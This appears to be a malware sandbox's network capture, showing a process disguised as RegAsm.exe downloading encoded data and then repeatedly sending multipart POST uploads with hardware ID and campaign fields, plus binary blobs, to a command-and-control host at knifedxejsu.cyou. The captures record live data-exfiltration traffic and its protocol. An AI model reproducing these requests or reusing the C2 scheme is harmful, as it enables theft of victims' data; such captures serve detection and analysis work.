2024-11-08 11:02:35 UTC	1369	IN	Data Raw: 6f 38 43 6a 63 76 71 46 66 46 4b 48 2b 41 47 76 4a 47 7a 6b 58 4e 52 57 48 70 72 4d 35 45 74 30 59 4d 6e 6a 78 54 31 68 31 76 62 78 6b 4f 68 61 2b 6f 64 77 56 35 79 33 4f 2b 49 78 4c 66 34 63 31 46 42 55 7a 59 62 6f 51 33 70 6c 77 75 79 47 65 79 72 44 37 71 50 4f 70 58 7a 74 6b 58 4a 56 67 50 59 54 71 43 42 6c 35 46 58 59 56 52 47 53 77 71 41 49 4f 57 48 52 6f 39 30 7a 41 4e 7a 6c 76 63 4b 2f 65 62 2b 49 4f 55 4c 4b 38 67 33 69 64 69 50 6a 58 64 64 64 45 4a 76 49 35 45 70 2f 61 4d 54 73 67 33 6b 68 31 75 53 35 77 4b 6c 30 39 4a 68 33 58 6f 66 78 42 36 34 76 5a 71 63 53 6b 31 73 4d 31 5a 36 67 61 48 35 6c 32 36 47 77 63 43 2f 66 36 61 65 49 74 7a 66 6d 31 33 42 58 79 71 31 42 72 43 74 73 39 56 33 42 57 52 71 48 79 75 56 41 64 47 58 48 34 34 42 30 4c 4e 2f Data Ascii: o8CjcvqFfFKH+AGvJGzkXNRWHprM5Et0YMnjxT1h1vbxkOha+odwV5y3O+IxLf4c1FBUzYboQ3plwuyGeyrD7qPOpXztkXJVgPYTqCBl5FXYVRGSwqAIOWHRo90zANzlvcK/eb+IOULK8g3idiPjXdddEJvI5Ep/aMTsg3kh1uS5wKl09Jh3XofxB64vZqcSk1sM1Z6gaH5l26GwcC/f6aeItzfm13BXyq1BrCts9V3BWRqHyuVAdGXH44B0LN/
2024-11-08 11:02:35 UTC	1369	IN	Data Raw: 7a 66 6d 31 33 42 58 79 71 31 42 72 69 64 6a 37 46 62 58 58 42 4f 59 77 2b 4e 42 65 6d 76 4f 36 59 74 30 4a 64 33 6e 76 4d 36 6f 66 76 75 53 5a 56 36 44 2b 51 33 69 59 43 50 67 52 4a 4d 45 56 4c 72 42 39 6b 56 57 5a 64 6a 71 78 57 78 76 79 4b 36 32 78 4f 67 68 76 35 42 79 55 34 48 7a 43 61 49 38 5a 75 6c 58 30 6c 59 53 6c 4d 76 73 51 48 6c 6e 79 65 57 4a 63 79 62 57 2f 4b 50 4e 72 6d 76 31 31 7a 6b 62 6a 65 31 42 2b 6d 35 56 39 30 76 43 53 6c 61 67 78 65 35 49 66 6e 43 4a 2f 4d 74 71 59 64 62 69 38 5a 44 6f 63 76 2b 62 63 46 4f 4d 38 51 6d 74 49 57 72 31 58 64 39 53 42 70 4c 47 36 55 68 32 61 73 44 75 67 6e 34 71 32 2b 4f 31 7a 36 6b 35 73 64 64 77 51 38 71 74 51 5a 51 2b 62 75 74 79 32 46 41 64 31 64 6d 75 58 7a 6c 68 78 61 50 64 4d 79 58 64 35 72 76 48 Data Ascii: zfm13BXyq1Bridj7FbXXBOYw+NBemvO6Yt0Jd3nvM6ofvuSZV6D+Q3iYCPgRJMEVLrB9kVWZdjqxWxvyK62xOghv5ByU4HzCaI8ZulX0lYSlMvsQHlnyeWJcybW/KPNrmv11zkbje1B+m5V90vCSlagxe5IfnCJ/MtqYdbi8ZDocv+bcFOM8QmtIWr1Xd9SBpLG6Uh2asDugn4q2+O1z6k5sddwQ8qtQZQ+buty2FAd1dmuXzlhxaPdMyXd5rvH
2024-11-08 11:02:35 UTC	1369	IN	Data Raw: 4e 77 58 34 7a 36 51 65 78 75 5a 50 38 63 69 78 77 37 73 76 4f 69 5a 30 4d 6d 31 71 32 63 4d 79 62 64 72 75 6d 49 70 48 72 7a 6e 33 68 64 67 2f 6b 4c 71 79 56 76 37 46 6a 66 56 52 47 54 78 2b 56 44 65 47 4c 46 36 59 4e 77 49 74 37 68 76 73 44 6f 4e 37 2b 51 62 78 76 53 74 53 53 31 4a 57 33 68 48 4d 77 53 44 64 58 42 37 41 59 68 4a 73 58 71 67 33 55 6b 33 65 2b 33 77 4b 31 78 2b 35 5a 78 58 59 6e 36 42 61 63 76 62 4f 4e 51 33 56 59 56 6c 4d 72 72 53 58 4a 6a 69 61 33 46 64 44 6d 52 74 76 48 35 71 32 2f 6f 68 33 73 62 6c 62 73 59 34 69 6c 76 70 77 53 54 58 51 61 66 7a 4f 35 44 64 6d 50 4b 37 49 4a 2b 4a 39 33 6b 75 4d 43 75 64 76 61 46 64 46 65 45 38 67 2b 75 49 47 37 74 58 39 34 63 57 74 58 42 2b 41 59 68 4a 75 58 6b 69 46 30 71 33 65 6e 78 31 2b 5a 67 76 Data Ascii: NwX4z6QexuZP8cixw7svOiZ0Mm1q2cMybdrumIpHrzn3hdg/kLqyVv7FjfVRGTx+VDeGLF6YNwIt7hvsDoN7+QbxvStSS1JW3hHMwSDdXB7AYhJsXqg3Uk3e+3wK1x+5ZxXYn6BacvbONQ3VYVlMrrSXJjia3FdDmRtvH5q2/oh3sblbsY4ilvpwSTXQafzO5DdmPK7IJ+J93kuMCudvaFdFeE8g+uIG7tX94cWtXB+AYhJuXkiF0q3enx1+Zgv
2024-11-08 11:02:35 UTC	1369	IN	Data Raw: 53 74 56 6e 69 47 47 54 33 54 4e 41 65 4a 59 50 46 39 6b 31 30 61 6f 6e 38 79 32 70 68 31 75 4c 78 6b 4f 68 2f 38 4a 35 30 56 49 76 38 44 61 38 72 61 75 4a 64 31 56 67 65 6e 38 62 6d 51 48 68 6a 77 2b 43 45 65 53 6a 57 35 72 62 4c 75 6a 6d 78 31 33 42 44 79 71 31 42 69 79 6c 78 36 55 79 54 51 31 71 4d 68 75 64 4b 4f 54 36 4a 35 34 39 38 4a 64 62 69 74 38 32 75 64 50 36 59 64 6c 75 46 38 51 71 72 4b 47 4c 71 57 64 35 59 42 70 2f 4e 37 30 70 77 61 73 53 6a 79 7a 4d 6d 79 61 37 70 69 4a 6c 30 38 5a 6c 77 54 63 72 71 54 37 74 75 5a 4f 73 63 69 78 77 56 6d 63 6e 6a 53 58 70 6c 79 4f 6d 58 59 53 33 59 35 72 54 45 6f 33 66 35 68 58 46 55 67 2f 59 43 71 79 6c 72 36 31 62 51 57 31 54 62 68 75 64 65 4f 54 36 4a 77 4a 4a 6a 4c 4a 48 78 2f 39 48 6f 66 76 50 58 4c 78 Data Ascii: StVniGGT3TNAeJYPF9k10aon8y2ph1uLxkOh/8J50VIv8Da8rauJd1Vgen8bmQHhjw+CEeSjW5rbLujmx13BDyq1Biylx6UyTQ1qMhudKOT6J5498Jdbit82udP6YdluF8QqrKGLqWd5YBp/N70pwasSjyzMmya7piJl08ZlwTcrqT7tuZOscixwVmcnjSXplyOmXYS3Y5rTEo3f5hXFUg/YCqylr61bQW1TbhudeOT6JwJJjLJHx/9HofvPXLx
2024-11-08 11:02:35 UTC	1369	IN	Data Raw: 70 43 46 73 37 6c 58 58 56 42 65 56 77 75 52 42 66 47 58 46 36 49 4a 77 4c 74 58 6e 76 38 47 6e 4f 62 48 58 63 45 50 4b 72 55 47 44 4e 57 44 72 55 5a 4e 44 57 6f 79 47 35 30 6f 35 50 6f 6e 76 69 33 59 68 32 2b 69 31 7a 61 35 7a 2b 70 64 38 57 49 58 78 42 36 59 68 59 2b 78 56 30 6c 6f 52 6e 38 33 6d 53 33 70 67 7a 36 50 4c 4d 79 62 4a 72 75 6d 49 69 47 4c 79 6d 33 41 62 6c 62 73 59 34 69 6c 76 70 77 53 54 56 78 69 52 77 65 42 4c 65 6d 37 4d 35 34 39 32 49 64 6e 38 75 63 69 76 61 2b 32 58 66 6c 36 47 39 67 47 6d 4b 47 72 68 58 39 63 63 57 74 58 42 2b 41 59 68 4a 75 54 76 67 6c 6f 6d 79 71 36 75 68 72 45 35 2b 4a 73 33 41 38 72 30 43 71 67 68 62 75 52 61 30 46 63 52 6e 38 66 6e 54 6e 52 30 79 75 79 4b 64 79 48 65 36 4c 66 4a 70 33 2f 34 6e 6e 5a 54 6a 62 56 Data Ascii: pCFs7lXXVBeVwuRBfGXF6IJwLtXnv8GnObHXcEPKrUGDNWDrUZNDWoyG50o5Ponvi3Yh2+i1za5z+pd8WIXxB6YhY+xV0loRn83mS3pgz6PLMybJrumIiGLym3AblbsY4ilvpwSTVxiRweBLem7M5492Idn8uciva+2Xfl6G9gGmKGrhX9ccWtXB+AYhJuTvglomyq6uhrE5+Js3A8r0CqghbuRa0FcRn8fnTnR0yuyKdyHe6LfJp3/4nnZTjbV
2024-11-08 11:02:35 UTC	1369	IN	Data Raw: 74 6c 69 31 45 59 5a 6b 39 48 78 43 6d 78 6c 78 2b 32 43 5a 57 47 66 72 72 36 49 38 45 43 2f 33 7a 64 6b 78 4c 55 5a 34 6e 59 6a 30 6c 2f 64 55 68 4f 44 31 36 31 68 59 32 76 50 39 4a 51 7a 62 35 48 6f 38 5a 44 34 4e 37 2b 54 5a 68 76 53 70 56 50 35 65 7a 43 77 44 49 46 44 57 6f 79 47 39 67 59 68 4e 49 65 6a 6c 7a 4e 35 6b 61 6d 79 32 72 70 2f 2f 49 46 30 48 4c 54 4c 4c 36 55 6f 5a 75 42 4d 6b 58 49 66 67 63 47 67 43 44 6c 70 69 62 75 38 4d 32 6d 52 30 66 2b 49 73 44 6d 6e 31 30 4a 59 68 50 73 47 74 44 38 75 79 56 76 56 57 52 4f 46 68 4d 35 4e 62 57 47 4a 72 63 56 31 59 59 6d 2b 2f 34 69 73 61 4c 2f 50 4a 77 6e 52 6f 46 4c 31 66 6a 48 34 45 73 6f 63 41 74 57 65 73 67 67 35 64 49 6d 37 78 54 51 69 77 2f 79 33 79 37 35 36 75 4b 6c 4a 57 4a 7a 34 44 71 6b 76 Data Ascii: tli1EYZk9HxCmxlx+2CZWGfrr6I8EC/3zdkxLUZ4nYj0l/dUhOD161hY2vP9JQzb5Ho8ZD4N7+TZhvSpVP5ezCwDIFDWoyG9gYhNIejlzN5kamy2rp//IF0HLTLL6UoZuBMkXIfgcGgCDlpibu8M2mR0f+IsDmn10JYhPsGtD8uyVvVWROFhM5NbWGJrcV1YYm+/4isaL/PJwnRoFL1fjH4EsocAtWesgg5dIm7xTQiw/y3y756uKlJWJz4Dqkv
2024-11-08 11:02:35 UTC	1369	IN	Data Raw: 4e 70 46 35 76 49 35 31 42 6f 4b 2b 37 74 67 6e 49 33 77 66 6d 2b 68 34 5a 50 33 74 63 35 47 34 79 31 57 66 42 67 49 2b 4e 4e 6b 77 52 45 78 35 32 31 46 53 34 32 6d 2f 7a 4c 61 6d 48 48 72 75 6d 61 35 6a 6e 74 31 79 38 62 7a 66 59 54 73 43 68 67 38 56 2b 55 59 69 71 79 79 4f 64 48 62 33 62 45 37 36 52 77 4d 4e 76 51 6a 39 32 72 64 2f 47 51 59 55 72 4b 75 30 47 74 62 6a 76 65 48 4a 73 63 4b 39 75 47 2b 41 59 68 4a 76 7a 67 69 33 30 6d 78 2f 2f 38 37 36 5a 2b 2f 6f 46 6e 56 6f 62 55 41 72 4d 6b 49 36 6b 63 31 52 78 4d 78 34 69 67 51 6d 67 6d 6b 62 50 58 4b 48 53 43 75 65 47 61 74 7a 66 6d 31 32 45 62 30 71 64 50 34 6a 77 6a 76 78 79 55 58 77 61 48 77 4f 4e 51 65 69 48 33 33 61 42 6b 49 73 48 6f 73 76 61 57 55 76 4f 52 63 45 47 4e 38 79 65 43 62 69 32 6e 55 Data Ascii: NpF5vI51BoK+7tgnI3wfm+h4ZP3tc5G4y1WfBgI+NNkwREx521FS42m/zLamHHruma5jnt1y8bzfYTsChg8V+UYiqyyOdHb3bE76RwMNvQj92rd/GQYUrKu0GtbjveHJscK9uG+AYhJvzgi30mx//876Z+/oFnVobUArMkI6kc1RxMx4igQmgmkbPXKHSCueGatzfm12Eb0qdP4jwjvxyUXwaHwONQeiH33aBkIsHosvaWUvORcEGN8yeCbi2nU
2024-11-08 11:02:35 UTC	1369	IN	Data Raw: 62 77 61 41 49 4f 58 36 4a 75 38 56 65 4d 39 62 2b 73 6f 71 4e 51 37 32 6d 59 56 69 4b 2b 77 62 69 4d 53 33 2b 48 4d 55 63 54 4d 61 49 6f 46 51 35 50 6f 6d 6b 69 33 34 67 30 75 43 79 32 72 70 2f 2f 49 46 30 48 4c 54 4c 4c 71 6b 76 63 2b 70 4e 33 6c 67 43 71 2f 6a 48 51 48 78 68 39 39 32 79 59 69 62 42 72 4a 66 4c 76 6e 71 2f 32 54 64 44 79 71 31 42 68 53 68 6d 34 42 79 64 48 42 44 56 6e 71 42 70 63 6d 66 5a 37 70 52 2b 4a 63 65 73 6c 73 36 74 66 72 2f 5a 4e 31 66 4b 72 55 47 74 50 32 54 68 57 64 51 51 45 34 2f 42 6f 41 67 35 61 49 6d 37 78 58 77 77 31 75 69 30 7a 2b 52 2f 38 5a 6b 33 52 4d 54 73 51 62 52 75 4f 37 51 53 6b 30 35 55 7a 59 61 6e 53 48 52 6e 79 75 32 47 59 54 50 58 37 61 66 4c 37 30 66 42 74 32 64 59 6e 76 49 77 72 79 70 31 38 6c 2f 44 57 79 Data Ascii: bwaAIOX6Ju8VeM9b+soqNQ72mYViK+wbiMS3+HMUcTMaIoFQ5Pomki34g0uCy2rp//IF0HLTLLqkvc+pN3lgCq/jHQHxh992yYibBrJfLvnq/2TdDyq1BhShm4BydHBDVnqBpcmfZ7pR+Jcesls6tfr/ZN1fKrUGtP2ThWdQQE4/BoAg5aIm7xXww1ui0z+R/8Zk3RMTsQbRuO7QSk05UzYanSHRnyu2GYTPX7afL70fBt2dYnvIwryp18l/DWy

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49755	172.67.187.9	443	4588	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-08 11:02:36 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=3194BVERV3B73RVVVVVV User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12859 Host: knifedxejsu.cyou
2024-11-08 11:02:36 UTC	12859	OUT	Data Raw: 2d 2d 33 31 39 34 42 56 45 52 56 33 42 37 33 52 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 33 45 30 42 46 45 42 30 31 44 36 30 41 34 41 30 39 39 43 43 30 30 35 45 35 41 32 30 33 36 43 0d 0a 2d 2d 33 31 39 34 42 56 45 52 56 33 42 37 33 52 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 31 39 34 42 56 45 52 56 33 42 37 33 52 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d Data Ascii: --3194BVERV3B73RVVVVVVContent-Disposition: form-data; name="hwid"23E0BFEB01D60A4A099CC005E5A2036C--3194BVERV3B73RVVVVVVContent-Disposition: form-data; name="pid"2--3194BVERV3B73RVVVVVVContent-Disposition: form-data; name="lid"HpOoIh-
2024-11-08 11:02:36 UTC	1016	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 11:02:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7ferf8jefd792b075879jlqphe; expires=Tue, 04-Mar-2025 04:49:15 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k9wnvMZYMDhL%2Fkyw0lhRoHzK5G9XzAphRu3TB%2BAr0jz9b16Xxcb8xl0gOTW75u1rVkD%2FKY7ZOmfQ%2FjoYtEvO5NFmuC9N4nVRag7%2BK9mSIOXGb7F3rv8F2QPmW%2BPZTpl8iTPP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8df5125c0d506ba9-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1657&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2839&recv_bytes=13801&delivery_rate=1646389&cwnd=251&unsent_bytes=0&cid=e4670aa8ba40ed75&ts=818&x=0"
2024-11-08 11:02:36 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a Data Ascii: 11ok 173.254.250.90
2024-11-08 11:02:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49766	172.67.187.9	443	4588	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-08 11:02:37 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=83DMPBQZRJR73RVVVV User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15065 Host: knifedxejsu.cyou
2024-11-08 11:02:37 UTC	15065	OUT	Data Raw: 2d 2d 38 33 44 4d 50 42 51 5a 52 4a 52 37 33 52 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 33 45 30 42 46 45 42 30 31 44 36 30 41 34 41 30 39 39 43 43 30 30 35 45 35 41 32 30 33 36 43 0d 0a 2d 2d 38 33 44 4d 50 42 51 5a 52 4a 52 37 33 52 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 33 44 4d 50 42 51 5a 52 4a 52 37 33 52 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 74 6f 70 67 Data Ascii: --83DMPBQZRJR73RVVVVContent-Disposition: form-data; name="hwid"23E0BFEB01D60A4A099CC005E5A2036C--83DMPBQZRJR73RVVVVContent-Disposition: form-data; name="pid"2--83DMPBQZRJR73RVVVVContent-Disposition: form-data; name="lid"HpOoIh--@topg
2024-11-08 11:02:38 UTC	1012	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 11:02:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qgar55sn05hc84019b4jbvvh8u; expires=Tue, 04-Mar-2025 04:49:16 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qPNFeMY9u%2Fr%2BFbQhVH5TWfB3zXQpTlwnJK3xKxvUJ8vbMtkUuYAM3djK4YjnWD2o%2FB2dBSohQ3GYtHFC78A0ejGHgqKvulnE92253ynuTp1WfG0re3aKa5BNIRc5Yl7%2BJtEe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8df512650bbe3588-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1248&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2839&recv_bytes=16005&delivery_rate=2257209&cwnd=251&unsent_bytes=0&cid=b62ba8f56327406d&ts=538&x=0"
2024-11-08 11:02:38 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a Data Ascii: 11ok 173.254.250.90
2024-11-08 11:02:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49772	172.67.187.9	443	4588	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-08 11:02:38 UTC	289	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=4E4KM2ER33VJ7RVVVVVVVVVVV User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20623 Host: knifedxejsu.cyou
2024-11-08 11:02:38 UTC	15331	OUT	Data Raw: 2d 2d 34 45 34 4b 4d 32 45 52 33 33 56 4a 37 52 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 33 45 30 42 46 45 42 30 31 44 36 30 41 34 41 30 39 39 43 43 30 30 35 45 35 41 32 30 33 36 43 0d 0a 2d 2d 34 45 34 4b 4d 32 45 52 33 33 56 4a 37 52 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 34 45 34 4b 4d 32 45 52 33 33 56 4a 37 52 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 Data Ascii: --4E4KM2ER33VJ7RVVVVVVVVVVVContent-Disposition: form-data; name="hwid"23E0BFEB01D60A4A099CC005E5A2036C--4E4KM2ER33VJ7RVVVVVVVVVVVContent-Disposition: form-data; name="pid"3--4E4KM2ER33VJ7RVVVVVVVVVVVContent-Disposition: form-data; name="
2024-11-08 11:02:38 UTC	5292	OUT	Data Raw: fc c9 73 85 73 b5 b3 fb 1e ad 65 a2 84 e9 f2 68 b1 54 18 69 48 37 7a 99 99 08 13 c6 1b 09 3d 51 42 2d 3f 59 1d 59 90 6a 24 94 cb a5 d1 7c a5 91 90 6c b4 51 98 a9 b7 4a 24 6e 49 6e c9 56 ca e5 5a 2b a1 3f 3a 9e b9 75 bf a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 7d 51 30 b7 ee a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 ae 3f 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce f5 45 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 fe 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: ssehTiH7z=QB-?YYj$\|lQJ$nInVZ+?:us}Q0u?4E([
2024-11-08 11:02:40 UTC	1021	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 11:02:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9iud9el6uoi89pf9d2v5u2r9fi; expires=Tue, 04-Mar-2025 04:49:18 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q3Qe8lPnMOG7L2Vcfv4eBe4EdkPfcU%2B%2BYiW1ObtiC0GFIOK31%2Fmb3Iw1zPiVYhLRzIk%2F%2FiH5a4%2FDPAkTM%2FhrPk6prQpzgsEkuQjBnQAQYc3waooUWFhafz%2B37c5XLLs1NsgL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8df5126cbc27463b-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=944&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2838&recv_bytes=21592&delivery_rate=2940101&cwnd=241&unsent_bytes=0&cid=7c333ef22cd15cb5&ts=1691&x=0"
2024-11-08 11:02:40 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a Data Ascii: 11ok 173.254.250.90
2024-11-08 11:02:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49788	172.67.187.9	443	4588	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-08 11:02:41 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=0ME6R0JBVZ3JRVVVV User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1231 Host: knifedxejsu.cyou
2024-11-08 11:02:41 UTC	1231	OUT	Data Raw: 2d 2d 30 4d 45 36 52 30 4a 42 56 5a 33 4a 52 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 33 45 30 42 46 45 42 30 31 44 36 30 41 34 41 30 39 39 43 43 30 30 35 45 35 41 32 30 33 36 43 0d 0a 2d 2d 30 4d 45 36 52 30 4a 42 56 5a 33 4a 52 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 4d 45 36 52 30 4a 42 56 5a 33 4a 52 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 74 6f 70 67 63 72 0d Data Ascii: --0ME6R0JBVZ3JRVVVVContent-Disposition: form-data; name="hwid"23E0BFEB01D60A4A099CC005E5A2036C--0ME6R0JBVZ3JRVVVVContent-Disposition: form-data; name="pid"1--0ME6R0JBVZ3JRVVVVContent-Disposition: form-data; name="lid"HpOoIh--@topgcr
2024-11-08 11:02:41 UTC	1018	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 11:02:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=n3vehk7589jsuedbvu25ogpio2; expires=Tue, 04-Mar-2025 04:49:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ico8wKowM5Y%2Bs6DaioPoowwra0i3zM9L3HMJSXgt15%2BYim%2BGazhwAgsV%2BG8uKuI9lt7h%2Br8uHr0ipy%2F2KhOtAEN0bFFKuKsBY9VnHmVVD%2FhPlM8%2BZxSK0exAqkrXm9aL4Rb5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8df5127c5e38e95a-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1130&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2147&delivery_rate=2285714&cwnd=244&unsent_bytes=0&cid=055e61fc43fad339&ts=735&x=0"
